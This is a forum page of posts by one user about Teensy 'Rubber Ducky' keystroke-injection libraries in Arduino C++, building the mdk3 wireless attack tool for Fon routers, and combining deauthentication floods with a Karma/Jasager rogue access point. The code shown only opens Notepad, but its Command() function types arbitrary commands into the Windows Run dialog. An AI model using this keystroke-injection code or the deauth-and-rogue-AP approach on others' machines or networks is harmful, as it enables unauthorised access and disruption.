Jump to content

NFG

Active Members
  • Posts

    26
  • Joined

  • Last visited

Everything posted by NFG

  1. I started playing with my Teensy in the Arduino software a couple of days ago and realized that the arduino software is just a bunch of cpp code in libraries, cores, and examples files. This gave me an idea. Why don’t we try to make a set of standard libraries for the rubber ducky? This would help everyone stop reinventing the same code for every project. Does this sound like a good idea? To help show how easy this is I’ve posted my conversion of haxwithaxe/Irongeek sample code. Just make the files listed below under the (Arduino folder)\libraries\RubberDucky and (Arduino folder)\libraries\RubberDucky\examples folders. Then when you open the Arduino software there is a RubberDucky option in the examples menu. (Arduino folder)\libraries\RubberDucky\KeyPress.h /* KeyPress.h - Library for sending single a Key press. Created by NFG, 5 7, 2010. Released into the public domain. */ #ifndef KeyPress_h #define KeyPress_h #include "WProgram.h" void KeyPress(int _SomeKey); void KeyCombo(int _ModKey,int _SomeKey); #endif (Arduino folder)\libraries\RubberDucky\KeyPress.cpp /* KeyPress.cpp - Library for sending single a Key press. Created by NFG, 5 7, 2010. Released into the public domain. */ #include "WProgram.h" #include "KeyPress.h" void KeyPress(int _SomeKey) { Keyboard.set_key1(_SomeKey); // set some key Keyboard.send_now(); // "press" some key // clear some key Keyboard.set_key1(0); Keyboard.send_now(); } void KeyCombo(int _ModKey,int _SomeKey) { Keyboard.set_modifier(_ModKey); //set one or more modifier keys Keyboard.set_key1(_SomeKey); // set regular key Keyboard.send_now(); // send strokes // clear keys Keyboard.set_modifier(0); // prep release of control keys Keyboard.set_key1(0); // have to do this to keep it from hitting key multiple times. Keyboard.send_now(); } (Arduino folder)\libraries\RubberDucky\Windows.h /* Windows.h - Library for Common wondows keyboard shortcuts. Created by NFG, 5 7, 2010. Released into the public domain. */ #ifndef Windows_h #define Windows_h #include "WProgram.h" #include "KeyPress.h" namespace Windows { void Command(char *_SomeCommand); void Help(void); void Start(void); void Switch(void); void Quit(void); void Lock(void); void MinAll(void); void Explorer(void); void Copy(void); void Cut(void); void Paste(void); void SelAll(void); }; #endif (Arduino folder)\libraries\RubberDucky\Windows.cpp /* Windows.cpp - Library for Common wondows keyboard shortcuts. Created by NFG, 5 7, 2010. Released into the public domain. */ #include "WProgram.h" #include "Windows.h" #include "KeyPress.h" namespace Windows { void Command(char *_SomeCommand) { KeyCombo(MODIFIERKEY_GUI,KEY_R); // open run dialog delay(1500); // wait for it to open Keyboard.print(_SomeCommand); // enter some command KeyPress(KEY_ENTER); // exec some command } void Help(void) { KeyPress(KEY_F1); // Display Help } void Start(void) { KeyCombo(MODIFIERKEY_GUI,0); // Display Start Menu } void Switch(void) { KeyCombo(MODIFIERKEY_ALT,KEY_TAB); // open run dialog } void Quit(void) { KeyCombo(MODIFIERKEY_ALT,KEY_F4); // open run dialog } void Lock(void) { KeyCombo(MODIFIERKEY_GUI,KEY_L); // open run dialog } void MinAll(void) { KeyCombo(MODIFIERKEY_GUI,KEY_M); // open run dialog } void Explorer(void) { KeyCombo(MODIFIERKEY_GUI,KEY_E); // open run dialog } void Copy(void) { KeyCombo(MODIFIERKEY_CTRL,KEY_C); // open run dialog } void Cut(void) { KeyCombo(MODIFIERKEY_CTRL,KEY_X); // open run dialog } void Paste(void) { KeyCombo(MODIFIERKEY_CTRL,KEY_V); // open run dialog } void SelAll(void) { KeyCombo(MODIFIERKEY_CTRL,KEY_A); // open run dialog } } (Arduino folder)\libraries\RubberDucky\keywords.txt ####################################### # Syntax Coloring Map For Test ####################################### ####################################### # Datatypes (KEYWORD1) ####################################### Windows KEYWORD1 ####################################### # Methods and Functions (KEYWORD2) ####################################### KeyPress KEYWORD2 KeyCombo KEYWORD2 Command KEYWORD2 Help KEYWORD2 Start KEYWORD2 Switch KEYWORD2 Quit KEYWORD2 Lock KEYWORD2 MinAll KEYWORD2 Explorer KEYWORD2 Copy KEYWORD2 Cut KEYWORD2 Paste KEYWORD2 SelAll KEYWORD2 (Arduino folder)\libraries\RubberDucky\examples\Windows_example\Windows_example.pde #include <KeyPress.h> #include <Windows.h> /* The following Library was haxwithaxe and Omidenchin(aka Omi)) code to do simple keyboard functions with the Teensy converted to a Library format. NOTE: The original code is Irongeek's (with many additions and subtractions by haxwithaxe and Omidenchin(aka Omi)) haxwithaxe has removed the DIPSwitch code because he doesn't have a dipswitch to play with, but it can be just as easily put back in and used to select the payload. It is strongly recommended that you go to Irongeek's site and not only look at his code but watch the accompanying video right above the code example Original Source: http://www.irongeek.com/i.php?page=securit...eystroke-dongle Also see his updated source with some of my stuff in it. To learn more about Teensyduino see: http://www.pjrc.com/teensy/teensyduino.html Look in arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_api.h for key definitions Edit arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_private.h to change USB Vendor and Product ID To learn more about keyboard shortcuts Apple: http://support.apple.com/kb/ht1343 Windows: http://support.microsoft.com/kb/126449 Gnome/KDE: http://www.novell.com/coolsolutions/tip/2289.html Please add more to this list if you can think of any window managers that have default keyboard shortcuts */ int ledPin = 11; // LED connected to digital pin 11 for teensy2 and pin 6 for teensy2++ // The setup() method runs once, when the sketch starts void setup() { // initialize the digital pin as an output: pinMode(ledPin, OUTPUT); } // the loop() method runs over and over again, // as long as the Arduino has power void loop() { delay(1000); // wait for host to listen digitalWrite(ledPin, HIGH); // set the LED on Windows::Command("notepad.exe"); delay(1000); Keyboard.print("Rubber Ducky was here!!! }:)"); delay(1000); Windows::SelAll(); delay(1000); KeyPress(KEY_BACKSPACE); delay(1000); Windows::Quit(); digitalWrite(ledPin, LOW); // set the LED off delay(1500); //keeps commands from being sent one after the other too fast }
  2. Have you thought about trying to build it for the FON2202 Caterpillar developers firmware?
  3. I don't have rights to upload the file which is why I posted the make file. This is what I did to build it. How To Build Packages Just make sure you download the 7.09 version of the sdk.
  4. The autoap.sh found my ap and tried to connect but it didn't work. I think the script might need some minor tweeks but I think it's close. I'll try to play with it more when I get some time. sed: /tmp/www/autoap.htm: No such file or directory ./autoap.sh: ./autoap.sh: 487: nvram: not found ./autoap.sh: ./autoap.sh: 487: gpio: not found ./autoap.sh: ./autoap.sh: 487: nvram: not found sh: 1: unknown operand Reading NVRAM variables... ./autoap.sh: ./autoap.sh: 492: nvram: not found sh: ap: unknown operand ./autoap.sh: ./autoap.sh: 497: nvram: not found sh: dhcp: unknown operand Successfully collected access point scan data, analysing... Status Type Name MAC Address Channel SNR[dB] Found open AP xxxx 00:05:5D:EC:25:68 6 39 Trying to connect to open AP: "xxxx" with MAC Address: 00:00:00:00:00:00 ./autoap.sh: ./autoap.sh: 524: nvram: not found ./autoap.sh: ./autoap.sh: 524: nvram: not found ./autoap.sh: ./autoap.sh: 524: nvram: not found ./autoap.sh: ./autoap.sh: 524: nvram: not found ./autoap.sh: ./autoap.sh: 524: nvram: not found ./autoap.sh: ./autoap.sh: 524: nvram: not found ./autoap.sh: ./autoap.sh: 524: nvram: not found cat: /tmp/var/run/udhcpc.pid: No such file or directory ping: www.google.com: Unknown host PING 127.0.0.1 (127.0.0.1): 56 data bytes 64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=1.4 ms 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=1.4 ms 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=1.3 ms 64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=1.3 ms 64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=1.3 ms --- 127.0.0.1 ping statistics --- 5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max = 1.3/1.3/1.4 ms ./autoap.sh: ./autoap.sh: 524: nvram: not found ./autoap.sh: ./autoap.sh: 524: nvram: not found ./autoap.sh: ./autoap.sh: 524: nvram: not found ping: www.google.com: Unknown host ./autoap.sh: ./autoap.sh: 524: nvram: not found ./autoap.sh: ./autoap.sh: 524: nvram: not found ping: www.google.com: Unknown host ./autoap.sh: ./autoap.sh: 524: gpio: not found ./autoap.sh: ./autoap.sh: 524: nvram: not found ping: www.google.com: Unknown host ./autoap.sh: ./autoap.sh: 524: nvram: not found ./autoap.sh: ./autoap.sh: 524: nvram: not found Failed to ping: "xxxx" Gateway: Received IP Address: ./autoap.sh: ./autoap.sh: 524: nvram: not found ./autoap.sh: ./autoap.sh: 524: nvram: not found ./autoap.sh: ./autoap.sh: 524: nvram: not found
  5. The autoap.exe didn't kill my fon the program just crashed because nvram.o was missing. I haven't tries all the scripts yet but I can when I get home.
  6. There should be client or ap filter on mdk3. I seem to remember deauthing everything other then my laptop. However I'm at work right now so I can't look at the command options. You are probably right about the serial cable. At the time I didn't have a serial cable connected to it so the network settings probably got messed up and locked me out somehow. But it wasn't anything a quick reset didn't fix.
  7. when I tried doing that it locked up the fon
  8. Do you think the autoap.exe would work on openwrt? Everything else is shell script or an awk script. I haven't looked at the scripts to much yet but I don't know why they couldn't be converted to openwrt.
  9. Yea I've been looking into that too. treebuey on fonerahacks.com converted it to the DD-WRT version of the fon. The main part of the program is a shell script that calls some custom programs or built in dd-wrt commands. So if the programs would work on openwrt then the only thing that needs to be changed are the dd-wrt commands to openwrt versions.
  10. I think you might need aircrack-ng installed too. I guess I should of tested it better but I was just so excited that I figured out how to get it to build correctly.
  11. As Orange said in his post about the new firmware Also it would be nice to have something that would work on all the different fons.
  12. If you don't hear back from orange I do have the latest openwrt trunk with the mdk3 pakage setup. It runs the same as his other than I have a newer build.
  13. That's why I asked how many devices everyone has.
  14. This is a follow up poll from Eviltechie's poll. This way if we know what people are trying to use.
  15. Yea but I had to try and see what would happen because if I didn't then everyone else would complain about it not working right.
  16. Just follow Robs guide on the forums Notes for Jasager on Fon+ 2201 it should get you up and running. However, before you start installing the stuff for Jasager buy a cheap USB stick and set it up as the storage/swap space. The jump drive is faster then the fons internal flash and if you mess something up just format the usb drive not the fon.
  17. Yes, with tinkering but I have a Fon+ and a Fon v2 so it took a bit more.
  18. I figured out how the Piranha firmware built the mdk3 package today and I was able to I compile my own package :D . mdk3 does kind of work along side karma but there are some minor issues. For example, when I tried setting up jasager on channel 6 and set mdk to channel hop it crashed my Fon+ after a minute or so <_< . However, it did run somewhat OK when both were set to the same channel. Unfortunately, I'm unable to upload the package to the forums. But I'll give everyone the makefile so that you can build it your self and maybe some one will be kind and upload the package for the people that don't know how to build it. include $(TOPDIR)/rules.mk PKG_NAME:=mdk3 PKG_REV:=5 PKG_VERSION:=v$(PKG_REV) PKG_RELEASE:=1 PKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION).tar.bz2 PKG_SOURCE_URL:=http://homepages.tu-darmstadt.de/~p_larbig/wlan/ PKG_SOURCE_SUBDIR:=$(PKG_NAME)-$(PKG_VERSION) PKG_SOURCE_VERSION:=$(PKG_REV) #PKG_SOURCE_PROTO:=svn include $(INCLUDE_DIR)/package.mk define Package/mdk3 SECTION:=net CATEGORY:=Network TITLE:=MDK3 URL:=http://homepages.tu-darmstadt.de/~p_larbig/wlan/ SUBMENU:=wireless endef define Package/mdk3/description Tool to exploit wireless vulnerabilities endef define Build/Configure endef define Package/mdk3/install $(INSTALL_DIR) $(1)/usr/sbin $(CP) $(PKG_BUILD_DIR)/mdk3 $(1)/usr/sbin/ endef $(eval $(call BuildPackage,mdk3))
  19. I know I'm playing with the firmware that has MDK3 on it. I was just wondering if anyone had any ideas as to how to get a list of the clients. That way there would be a working script if and when karma is added.
  20. Does anyone know of a way to get a list of clients that are associated with other Aps. Kismet makes a list but you need to exit kismet to update the list and I don't know if you can output the list in airodump-ng. I was trying to make a smart bomb that you could select one or all the clients that you want to deauthenticate. That way you would only attack known clients and it would stop the attack when the clients joined the karma ap. I was hoping that by doing this way you could run karma and the deauthenticate attack at the same time. It would also allow you to see if there is any targets in the area and maybe allow you to detect a karma ap too.
  21. You don't need to downgrade anything. The FON2 is still in the beta so they didn't lock anything down. At least mine wasn't. I just ran Freifunk AP51 GUI and selected the firmware. It's the same hardware as the FON+ with the addition of a usb chip so just follow the guide for the FON+ and it should work thats what I did.
  22. Cool if there is anything I can do to help let me know.
  23. How hard would it be to add the Karma patches to the Piranha Firmware? He already has MDK3 and aircrack-ng working on the fon. I haven't had a chance to test this firmware yet on my FON2 but I probably will over Christmas. It would probably work better then using the gargoyle firmware that is currently needed for the fon+ or the fon2.
×
×
  • Create New...